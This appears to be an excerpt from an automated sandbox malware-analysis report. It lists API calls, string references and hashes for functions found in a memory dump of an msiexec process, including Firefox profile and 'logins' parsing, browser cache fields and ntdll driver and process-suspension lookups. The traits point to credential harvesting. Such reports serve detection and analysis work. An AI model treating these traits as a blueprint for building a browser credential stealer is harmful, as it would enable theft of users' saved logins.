                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: be3527b3cb58d89c6039673a6ef97e93764ef87434a313ef4869442e38f47346
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: be3527b3cb58d89c6039673a6ef97e93764ef87434a313ef4869442e38f47346
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                              • wcscpy.MSVCRT ref: 004448B4
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
                                                              • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 2148543256-2163367763
                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              APIs
